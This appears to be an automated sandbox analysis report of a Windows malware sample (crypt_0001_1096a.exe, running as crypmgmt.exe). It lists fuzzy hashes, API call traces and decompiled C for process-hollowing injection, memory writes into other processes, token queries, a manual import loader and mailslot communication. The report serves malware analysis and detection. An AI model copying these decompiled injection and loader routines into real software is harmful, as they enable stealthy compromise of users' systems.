Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E2175, Relevance: 6.1, APIs: 4, Instructions: 107 Total matches: 388threadsynchronizationinjection

Similarity

Total matches: 388
API ID: ResumeThreadSuspendThreadWaitForSingleObjectmemset
String ID:
API String ID: 4069891769-0
Opcode ID: 97ca6bb9ca5fe7b510779c132f311c73afcc437a32033944fe2e30fe2d70fbee
Instruction ID: 389f8e6b2b9a9dadd75e162c423f4892cc8029b080c4ee30251df583d1f82c9e
Opcode Fuzzy Hash: B5019C47292A71C6D501A8068699739F1C3FB42EBAE2CF700D6C1B01DA0ED479F2DB6C
Instruction Fuzzy Hash: 389f8e6b2b9a9dadd75e162c423f4892cc8029b080c4ee30251df583d1f82c9e

APIs

memset.NTDLL ref: 002E21A3

Part of subcall function 002E1FFA: memset.NTDLL ref: 002E2036

ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 002E222D
WaitForSingleObject.KERNEL32(00000064), ref: 002E223B
SuspendThread.KERNEL32(?), ref: 002E224E

Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
Part of subcall function 002E1CB2: memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
Part of subcall function 002E1CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
Part of subcall function 002E1CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
Part of subcall function 002E1CB2: CloseHandle.KERNEL32(00000000), ref: 002E1EE0
Part of subcall function 002E1CB2: memset.NTDLL ref: 002E1EF4

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E372A, Relevance: 5.1, APIs: 4, Instructions: 110 Total matches: 409

Similarity

Total matches: 409
API ID: GetLastError$memcpymemset
String ID:
API String ID: 1724464136-0
Opcode ID: 752983b3e7944d967bfc605664b24e9bd319d7a804b265e52fc9e08d56eeb1c9
Instruction ID: ba4a7f234d9ebbe4fc635900303f1b764cd23262994ffbb79c20cb6415721215
Opcode Fuzzy Hash: C60170421A6E65C8F471D947689AB3BF487FF967F6D09F70020C23028E4E8061D71F89
Instruction Fuzzy Hash: ba4a7f234d9ebbe4fc635900303f1b764cd23262994ffbb79c20cb6415721215

APIs

memset.NTDLL ref: 002E3750
memcpy.NTDLL ref: 002E3778

Part of subcall function 002E3E68: NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
Part of subcall function 002E3E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
Part of subcall function 002E3E68: SetLastError.KERNEL32(00000000), ref: 002E3EA7

GetLastError.KERNEL32(00000010,00000218,002E4F6D,00000100,?,00000318,00000008), ref: 002E378F

Part of subcall function 002E3E27: NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
Part of subcall function 002E3E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
Part of subcall function 002E3E27: SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B

GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,002E4F6D,00000100), ref: 002E3872

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Process Name: crypmgmt.exe Analysis ID: 64002

General

Root Process Name:	Zx7i3Q9U9i.exe
Process MD5:	C007415B17DF758F2ED04850F95EE60E
Total matches:	36
Initial Analysis Report:	Open
Initial sample Analysis ID:	64002
Initial sample SHA 256:	212D2CE18964D507A6FE50EE7C33E5EC4FC6B44DEDCC9463D5F6E2581E48E4C3
Initial sample name:	crypt_0001_1096a.exe

Similar Executed Functions

Function 002E3122, Relevance: 10.6, APIs: 7, Instructions: 81 Total matches: 84native

Similarity

Total matches: 84
API ID: NtCloseNtQueryInformationToken$NtOpenProcessNtOpenProcessTokenmemcpy
String ID:
API String ID: 1776017925-0
Opcode ID: e71ad6eecb970af1def45c3799b202ba83529c651fa6d32aa02a68984f086bcb
Instruction ID: f4d3a45514e2a78a6ff484cd6517dbf474bab809adfac8e8e781d73a1b5f56bc
Opcode Fuzzy Hash: 7BE0F1411C06C3F798EA64406103F84D7A0FE10A51C9C6B16C1F87E1D00F30305F5A2F
Instruction Fuzzy Hash: f4d3a45514e2a78a6ff484cd6517dbf474bab809adfac8e8e781d73a1b5f56bc

APIs

NtOpenProcess.NTDLL(002E618C,00000400,?,002E7494), ref: 002E316A
NtOpenProcessToken.NTDLL(002E618C,00000008,00000000), ref: 002E317D
NtQueryInformationToken.NTDLL(00000000,00000001,00000000,00000000,002E618C), ref: 002E3198

Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168

NtQueryInformationToken.NTDLL(00000000,00000001,00000000,002E618C,002E618C,002E618C), ref: 002E31B5
memcpy.NTDLL(00000000,00000000,0000001C), ref: 002E31C2

Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D

NtClose.NTDLL(00000000), ref: 002E31D4
NtClose.NTDLL(002E618C), ref: 002E31DD

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E3880, Relevance: 7.6, APIs: 5, Instructions: 93 Total matches: 233nativethread

Similarity

Total matches: 233
API ID: GetLastErrorNtSetContextThreadRtlNtStatusToDosErrormemcpymemset
String ID:
API String ID: 405287775-0
Opcode ID: 16422fa5cbcf997cf8d8ddf4094cfe996cac4ccb4206dd4e90c3df64a56a7186
Instruction ID: 4ee8f91e38277187f96cecbc10f2c4ddb51f95b78ca4709a1d369a7576d9c959
Opcode Fuzzy Hash: FEF00C400F9BA0EBF812B6821491F547683BB02F32E0EF32051F200B863F02200E8B1A
Instruction Fuzzy Hash: 4ee8f91e38277187f96cecbc10f2c4ddb51f95b78ca4709a1d369a7576d9c959

APIs

memset.NTDLL ref: 002E38A2
GetLastError.KERNEL32(?,00000318,00000008), ref: 002E3995

Part of subcall function 002E3E68: NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
Part of subcall function 002E3E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
Part of subcall function 002E3E68: SetLastError.KERNEL32(00000000), ref: 002E3EA7

Part of subcall function 002E3DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3DDD

memcpy.NTDLL(00000218,002E4F92,00000100,?,00010003,?,?,00000318,00000008), ref: 002E391D

Part of subcall function 002E3E27: NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
Part of subcall function 002E3E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
Part of subcall function 002E3E27: SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B

NtSetContextThread.NTDLL(00000000,00010003,?,00000000,00000000,00000318,00000010,?,00010003,?,?,00000318,00000008), ref: 002E3974
RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3977

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E278F, Relevance: 6.1, APIs: 4, Instructions: 79 Total matches: 297native

Similarity

Total matches: 297
API ID: NtCloseNtCreateSectionRtlNtStatusToDosErrormemset
String ID:
API String ID: 2756933261-0
Opcode ID: b4b338d5d8f61f66a6222dbf3d0f3f210939ec075dfbdcc0bd39eb5c8c15d6ad
Instruction ID: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
Opcode Fuzzy Hash: FCE0C04226CAC4E7E9F2F8451403B2B9140BF80142D5D7BA663A88D67F0F20B0031B1E
Instruction Fuzzy Hash: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794

APIs

NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 002E27EA
memset.NTDLL ref: 002E280F
RtlNtStatusToDosError.NTDLL(00000000), ref: 002E282B
NtClose.NTDLL(?), ref: 002E283F

Part of subcall function 002E2750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 002E277D
Part of subcall function 002E2750: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E2784

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E3E68, Relevance: 4.5, APIs: 3, Instructions: 29 Total matches: 229memorynative

Similarity

Total matches: 229
API ID: NtAllocateVirtualMemoryRtlNtStatusToDosErrorSetLastError
String ID:
API String ID: 3367774474-0
Opcode ID: 41e13fcf86dc4b3d751067dcd296ed22fbfc5f147028583741b35f2a38466cce
Instruction ID: 9d0754b4a53c7716e52a0dbaf66079789dacaff85707c89c3e4538a0fd9930dd
Opcode Fuzzy Hash: B0C012801C1D82EAD57B9488419DB2A119677A1101C1D733211809D5407FA0305B0F1D
Instruction Fuzzy Hash: 9d0754b4a53c7716e52a0dbaf66079789dacaff85707c89c3e4538a0fd9930dd

APIs

NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
SetLastError.KERNEL32(00000000), ref: 002E3EA7

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E3E27, Relevance: 4.5, APIs: 3, Instructions: 26 Total matches: 236native

Similarity

Total matches: 236
API ID: NtWriteVirtualMemoryRtlNtStatusToDosErrorSetLastError
String ID:
API String ID: 1449157707-0
Opcode ID: 2ed1afa1f8d583104eaac44049c4c607334b4aa5ab8e72b653f2dcbc79efa973
Instruction ID: 8cccbe2df0253c9c18979b1fa8fd50b07792896aeb97b9ed1177a34a95bdebaa
Opcode Fuzzy Hash: 95C0928B1505C74DDB3AA98181EEF4DC2C57FB177342C31094088C972E598A326B4E49
Instruction Fuzzy Hash: 8cccbe2df0253c9c18979b1fa8fd50b07792896aeb97b9ed1177a34a95bdebaa

APIs

NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E3DE6, Relevance: 4.5, APIs: 3, Instructions: 26 Total matches: 238native

Similarity

Total matches: 238
API ID: NtReadVirtualMemoryRtlNtStatusToDosErrorSetLastError
String ID:
API String ID: 3946382534-0
Opcode ID: aed4696055f3d46c6fa4a2efaa20ff5ea458cda21972fc3345feb9d6d727ddb0
Instruction ID: a9cdfd71e4bef7ffe137eafdadfb13b9e2c13e58845fd9648d6a85622cd56536
Opcode Fuzzy Hash: 09C092CB1415C74DDB3AA99281EAF4DC2C57EB177342C31094088C971E598A366B4E49
Instruction Fuzzy Hash: a9cdfd71e4bef7ffe137eafdadfb13b9e2c13e58845fd9648d6a85622cd56536

APIs

NtReadVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084), ref: 002E3E04
RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E13
SetLastError.KERNEL32(00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E3E1A

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 00401639, Relevance: 16.6, APIs: 11, Instructions: 85 Total matches: 95
threadsynchronization

Similarity

Total matches: 95
API ID: CloseHandleCreateThreadGetExitCodeThreadGetLastErrorWaitForSingleObject$TerminateThread
String ID:
API String ID: 2699342322-0
Opcode ID: cbe0259121293ce785fa7e3a9f1ca2c81b7074ba88f55b4f5292b4e6af892abb
Instruction ID: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
Opcode Fuzzy Hash: AFF089CB049AC2E5412D34407422FE79092DF92683D1CA6612EDE3664B1F51711BFA1E
Instruction Fuzzy Hash: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82

C-Code - Quality: 100%

			E00401639(intOrPtr __eax, long _a4) {
				void* _v8;
				long _v12;
				void* _v16;
				void _v28;
				void* __ebx;
				void* _t29;
				void* _t34;
				long _t45;
				void* _t47;
				void* _t51;

				 *0x40305c = __eax;
				_v28 = _a4;
				 *0x4030e8 = 0x736c6e70; // executed
				_t29 = CreateThread(0, 0, E00401034,  &_v28, 0,  &_v12); // executed
				_v8 = _t29;
				if(_t29 == 0) {
					_a4 = GetLastError();
				} else {
					_t34 = CreateThread(0, 0, E004010FB,  &_v28, 0,  &_v12); // executed
					_t47 = _t34;
					_v16 = _t47;
					if(_t47 == 0) {
						_a4 = GetLastError();
					} else {
						_a4 = 0;
						WaitForSingleObject(_t47, 0xffffffff); // executed
						if(GetExitCodeThread(_t47,  &_a4) == 0 || _a4 != 0) {
							TerminateThread(_v8, _a4);
						} else {
							WaitForSingleObject(_v8, 0xffffffff);
							if(GetExitCodeThread(_v8,  &_a4) != 0 && _a4 == 0) {
								_t45 = E00401593( &_v28, _t51); // executed
								_a4 = _t45;
							}
						}
						CloseHandle(_v16);
					}
					CloseHandle(_v8);
				}
				return _a4;
			}

APIs

CreateThread.KERNEL32(00000000,00000000,00401034,?,00000000,?), ref: 0040166E
CreateThread.KERNEL32(00000000,00000000,004010FB,?,00000000,?), ref: 0040168C
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
GetExitCodeThread.KERNEL32(00000000,?,?,?,00000000), ref: 004016B0
WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
GetExitCodeThread.KERNEL32(?,?,?,?,00000000), ref: 004016C9

Part of subcall function 00401593: VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,00000000,757DC470,004016DC,?,?,00000000), ref: 004015B9

TerminateThread.KERNEL32(?,?,?,?,00000000), ref: 004016E7
CloseHandle.KERNEL32(?), ref: 004016F0
GetLastError.KERNEL32(?,?,00000000), ref: 004016F8
CloseHandle.KERNEL32(?), ref: 00401704
GetLastError.KERNEL32(?,00000000), ref: 0040170D

Memory Dump Source

Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
Associated: 00000001.00000002.556350474.00404000.00000008.sdmp

Function 004010FB, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 90 Total matches: 95
sleepfile

Similarity

Total matches: 95
API ID: GetLastErrorSleep$CloseHandleCreateFileWriteFilememset
String ID: \\.\mailslot\msl0
API String ID: 1001206095-622273203
Opcode ID: 003b2913688191ea114162166813de589c119e69325853280e698207d87bc8a2
Instruction ID: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
Opcode Fuzzy Hash: DFF02E85425EC28BC77E20443911BE16086B782F42C6CC3B29ED2342AB8F40710A9746
Instruction Fuzzy Hash: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981

C-Code - Quality: 94%

			E004010FB(void* __ebx, void* __edi, void* _a4) {
				struct _SECURITY_ATTRIBUTES* _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _v24;
				void* _t28;
				void* _t34;
				int _t39;
				long _t40;
				long _t43;
				void* _t45;
				long _t46;
				void* _t48;
				void* _t52;

				_t48 = __edi;
				_t45 = __ebx;
				_v8 = 0;
				do {
					_t28 = CreateFileA("\\\\.\\mailslot\\msl0", 0x40000000, 3, 0, 3, 0, 0); // executed
					_v20 = _t28;
					if(_t28 != 0xffffffff) {
						_v12 = 0;
					} else {
						_v12 = GetLastError();
						Sleep(0x64);
					}
				} while (_v12 == 2);
				if(_v12 != 0) {
					L19:
					return _v12;
				}
				_t34 = E0040171F( *_a4,  &_a4,  &_v24); // executed
				if(_t34 == 0) {
					_v12 = 0xb;
					L18:
					CloseHandle(_v20);
					goto L19;
				}
				_t52 = _a4;
				_push(_t45);
				_t46 = _v24;
				_push(_t48);
				do {
					_v16 = _t46;
					if(_t46 >= 0x1000) {
						_v16 = 0x1000;
					}
					_t39 = WriteFile(_v20, _v8 + _t52, _v16,  &_v16, 0); // executed
					if(_t39 == 0) {
						_t40 = GetLastError();
						_v12 = _t40;
						if(_t40 != 0x79) {
							break;
						}
					} else {
						_t43 = _v16;
						_v8 = _v8 + _t43;
						_t46 = _t46 - _t43;
						if(_t46 == 0 && _t43 == 0x1000) {
							_t46 = _t46 + 1;
							_v8 = _v8 - 1;
						}
					}
					Sleep(0x64); // executed
				} while (_t46 != 0);
				memset(_t52, 0, _v8);
				E00401207(_t52);
				goto L18;
			}

APIs

CreateFileA.KERNEL32(\\.\mailslot\msl0,40000000,00000003,00000000,00000003,00000000,00000000), ref: 00401118
GetLastError.KERNEL32 ref: 00401126
Sleep.KERNEL32(00000064), ref: 00401131

Part of subcall function 0040171F: memcpy.NTDLL(?,?,?,?,?,00000000), ref: 00401806

WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0040118A
GetLastError.KERNEL32(?,?,00000002,?), ref: 004011A8
Sleep.KERNELBASE(00000064,?,?,00000002,?), ref: 004011B8
memset.NTDLL ref: 004011C8

Part of subcall function 00401207: HeapFree.KERNEL32(00000000,00401589,00401589), ref: 00401213

CloseHandle.KERNEL32(?), ref: 004011E4

Strings

\\.\mailslot\msl0, xrefs: 00401113

Memory Dump Source

Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
Associated: 00000001.00000002.556350474.00404000.00000008.sdmp

Function 002E1224, Relevance: 13.6, APIs: 9, Instructions: 77 Total matches: 182registrymemorystring

Similarity

Total matches: 182
API ID: HeapFreePathFindFileNameRegCloseKeyRegOpenKeyExRegQueryValueExRtlAllocateHeapStrStrIlstrcmpilstrlen
String ID:
API String ID: 1756712956-0
Opcode ID: f2f8398e5a378612a0451dc2799ca230d083f10daad558b8caa29df948c1a906
Instruction ID: 30042301f3adacd9a37cbdbd114ab521d6accad2819432d9e9ed4dab324ad14b
Opcode Fuzzy Hash: 73F027808E89B3CAC953D045D9CE7B64644BF90B5FC8C13A02480291551F6034EB3B5D
Instruction Fuzzy Hash: 30042301f3adacd9a37cbdbd114ab521d6accad2819432d9e9ed4dab324ad14b

APIs

PathFindFileNameW.SHLWAPI(002E618C), ref: 002E1246
lstrcmpiW.KERNEL32(00000000,?,002E7494), ref: 002E124D
RegOpenKeyExA.KERNEL32(80000001,002E8080,00000000,00000000,?,?,002E7494), ref: 002E127E
lstrlenW.KERNEL32(?,002E7494), ref: 002E1292
RtlAllocateHeap.NTDLL(00000000,?), ref: 002E12AA
RegQueryValueExW.KERNEL32(?,00000000,002E7494,00000000,002E7494,?,002E7494), ref: 002E12C9
StrStrIW.SHLWAPI(00000000), ref: 002E12E4
HeapFree.KERNEL32(00000000,00000000), ref: 002E12F9
RegCloseKey.ADVAPI32(?,?,002E7494), ref: 002E1302

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 00401389, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 89 Total matches: 143
librarystringloader

Similarity

Total matches: 143
API ID: lstrlenmemset$GetProcAddressLoadLibrary
String ID: ~
API String ID: 3655391705-1707062198
Opcode ID: 23239c877e3e9023a5525b3a16ecfaaed23ea4db6e96668c4a9e8c62ae4ebe7f
Instruction ID: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
Opcode Fuzzy Hash: EFF0590D195F71C6E16D6405187B7AA7082F39270BD14E9070193B31076880B3242F8C
Instruction Fuzzy Hash: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11

C-Code - Quality: 100%

			E00401389(void* __edi, intOrPtr _a4) {
				_Unknown_base(*)()* _v4;
				intOrPtr _v8;
				struct HINSTANCE__* _v12;
				signed int _v16;
				intOrPtr _t23;
				struct HINSTANCE__* _t24;
				intOrPtr _t27;
				intOrPtr _t28;
				_Unknown_base(*)()* _t29;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr _t35;
				void* _t42;
				CHAR* _t44;
				intOrPtr* _t46;
				CHAR* _t49;
				signed int* _t50;
				intOrPtr _t57;

				_t42 = __edi;
				_t50 =  &_v16;
				_v16 = _v16 & 0x00000000;
				_t33 =  *((intOrPtr*)(_a4 + 0x80));
				if(_t33 == 0) {
					L23:
					return _v16;
				}
				_t34 = _t33 + __edi;
				_t23 =  *((intOrPtr*)(_t34 + 0xc));
				if(_t23 == 0) {
					goto L23;
				}
				while(1) {
					_t44 = _t23 + _t42;
					_t24 = LoadLibraryA(_t44); // executed
					_v12 = _t24;
					if(_t24 == 0) {
						break;
					}
					memset(_t44, 0, lstrlenA(_t44));
					_t27 =  *_t34;
					_t35 =  *((intOrPtr*)(_t34 + 0x10));
					_t50 =  &(_t50[3]);
					if(_t27 != 0) {
						L6:
						_t46 = _t27 + _t42;
						_t28 =  *_t46;
						if(_t28 == 0) {
							L19:
							_t23 =  *((intOrPtr*)(_t34 + 0x20));
							_t34 = _t34 + 0x14;
							if(_t23 != 0) {
								continue;
							}
							L22:
							goto L23;
						}
						_v8 = _t35 - _t46 + _t42;
						_t57 = _t28;
						L8:
						L8:
						if(_t57 < 0) {
							if(_t28 < _t42 || _t28 >=  *((intOrPtr*)(_a4 + 0x50)) + _t42) {
								_t28 = 0;
							}
						} else {
							_t28 = _t28 + _t42;
						}
						_t11 = _t28 + 2; // 0x2
						_t49 = _t11;
						_t29 = GetProcAddress(_v12, _t49);
						_v4 = _t29;
						if(_t29 == 0) {
							goto L18;
						}
						if(_t49 >= 0) {
							memset(_t49, 0, lstrlenA(_t49));
							_t50 =  &(_t50[3]);
						}
						 *(_v8 + _t46) = _v4;
						_t46 = _t46 + 4;
						_t28 =  *_t46;
						if(_t28 != 0) {
							goto L8;
						} else {
							goto L19;
						}
						L18:
						_v16 = 0x7f;
						goto L19;
					}
					_t27 = _t35;
					if(_t35 == 0) {
						goto L19;
					}
					goto L6;
				}
				_v16 = 0x7e;
				goto L22;
			}

APIs

LoadLibraryA.KERNEL32(?), ref: 004013B6
lstrlenA.KERNEL32(?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 004013C9
memset.NTDLL ref: 004013D3
GetProcAddress.KERNEL32(?,00000002,?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 0040141E
lstrlenA.KERNEL32(00000002,?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 00401431
memset.NTDLL ref: 0040143B

Strings

~, xrefs: 00401471

Memory Dump Source

Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
Associated: 00000001.00000002.556350474.00404000.00000008.sdmp

Function 002E14CA, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 45 Total matches: 29librarythread

Similarity

Total matches: 29
API ID: FindWindowGetModuleHandleGetWindowThreadProcessIdLoadLibrary
String ID: USER32.DLL$pnls$pnls
API String ID: 1514306980-1300720345
Opcode ID: 2c5a9dded362ff6b46e0f4448b1e9a0fe29640a45ef5089f97095037391d754a
Instruction ID: 1c8a57dc03bd1ce046409f9638705802bfa1b9c8ef3fb2fc6285161cb0e1dd25
Opcode Fuzzy Hash: 95D023C40D5D4604447A48CDE4997BE01C7BC2073105A1D78501D404D34F57729F2F8D
Instruction Fuzzy Hash: 1c8a57dc03bd1ce046409f9638705802bfa1b9c8ef3fb2fc6285161cb0e1dd25

APIs

LoadLibraryA.KERNEL32(USER32.DLL), ref: 002E14D9
GetModuleHandleA.KERNEL32(USER32.DLL,002E8000,?,?,002E180F,00000000,?,002E7494), ref: 002E14FF
FindWindowA.USER32(002E8640,00000000,?,?,002E180F,00000000,?,002E7494), ref: 002E1515
GetWindowThreadProcessId.USER32(00000000,00000000,?,?,002E180F,00000000,?,002E7494), ref: 002E1520

Strings

USER32.DLL, xrefs: 002E14D3, 002E14D8, 002E14FE
pnls, xrefs: 002E1526
pnls, xrefs: 002E151B

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E1093, Relevance: 10.6, APIs: 7, Instructions: 67 Total matches: 199memorythread

Similarity

Total matches: 199
API ID: CloseHandleCreateThreadHeapCreateHeapDestroyInterlockedDecrementInterlockedIncrementSleepEx
String ID:
API String ID: 2400451634-0
Opcode ID: 20a1fe1949787535bd79f47ccd9ae32a5e8064993f8506e11f38a0a49419feba
Instruction ID: e3622a5643dd5bc20198795b8622ff9421b7fcc2ec09b542b244e7cafd184775
Opcode Fuzzy Hash: E2E02B881E4839C7857E180AD1DCF7102617FE1A5D9DC93511254561614F1DA0F77E8C
Instruction Fuzzy Hash: e3622a5643dd5bc20198795b8622ff9421b7fcc2ec09b542b244e7cafd184775

APIs

InterlockedIncrement.KERNEL32(002E7448), ref: 002E10B0
HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 002E10C5

Part of subcall function 002E1000: memcpy.NTDLL(002E7570,?,0000000C,002E6248,0000000C,002E10E9,?,00000000,?), ref: 002E1038

CreateThread.KERNEL32(00000000,00000000,Function_0000005B,00000000,?,00000000), ref: 002E10F1
InterlockedDecrement.KERNEL32(002E7448), ref: 002E1109
SleepEx.KERNEL32(00000064,00000001), ref: 002E1125
CloseHandle.KERNEL32 ref: 002E1141
HeapDestroy.KERNEL32 ref: 002E114E

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 00401033, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64 Total matches: 190
memorysleepfile

Similarity

Total matches: 190
API ID: GetLastError$CloseHandleCreateMailslotHeapReAllocReadFileSleep
String ID: \\.\mailslot\msl0
API String ID: 2393858888-622273203
Opcode ID: a3ceb4dbf8eec70be79f35f386a0360ab8bfc7ba483ab19be25d62c214bd66f1
Instruction ID: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
Opcode Fuzzy Hash: 18E026820629C5C6567F100A28013B360CBBB7174BDDEE7600AA7391830F823017964A
Instruction Fuzzy Hash: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395

C-Code - Quality: 96%

			E00401033(void* _a4) {
				signed int _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _t24;
				long _t25;
				void* _t27;
				int _t32;
				long _t33;
				void* _t34;
				void* _t36;
				long _t39;

				_pop(_t41);
				_t39 = 0;
				_v8 = 0x1000;
				_t24 = CreateMailslotA("\\\\.\\mailslot\\msl0", 0x1000, 0, 0);
				_v16 = _t24;
				if(_t24 == 0) {
					_t25 = GetLastError();
					_t36 = _a4;
					_v8 = _t25;
				} else {
					_t36 = E004011F2(0x1000);
					if(_t36 == 0) {
						L10:
						_v8 = 8;
					} else {
						do {
							_t32 = ReadFile(_v20, _t36 + _t39, 0x1000,  &_v16, 0); // executed
							if(_t32 == 0) {
								_t33 = GetLastError();
								_v8 = _t33;
								if(_t33 == 0x79) {
									_v16 = 0x1000;
									goto L8;
								}
							} else {
								_v12 = _v12 + 0x1000;
								_t39 = _t39 + _v16;
								_t34 = HeapReAlloc( *0x40305c, 0, _t36, _v12); // executed
								_t36 = _t34;
								if(_t36 == 0) {
									goto L10;
								} else {
									_v8 = _v8 & 0x00000000;
									goto L8;
								}
							}
							goto L11;
							L8:
							Sleep(0x64); // executed
						} while (_v16 == 0x1000);
					}
					L11:
					CloseHandle(_v20);
				}
				if(_v8 == 0) {
					_t27 = _a4;
					 *(_t27 + 4) = _t36;
					 *((intOrPtr*)(_t27 + 8)) = _t39;
				}
				return _v8;
			}

APIs

CreateMailslotA.KERNEL32(\\.\mailslot\msl0,00001000,00000000,00000000), ref: 0040104F
GetLastError.KERNEL32 ref: 004010D6

Part of subcall function 004011F2: RtlAllocateHeap.NTDLL(00000000,00000000,00401543,00000208,00000000,?,004015FD,?,00000000,?,00000000,?,?,?,00000000), ref: 004011FE

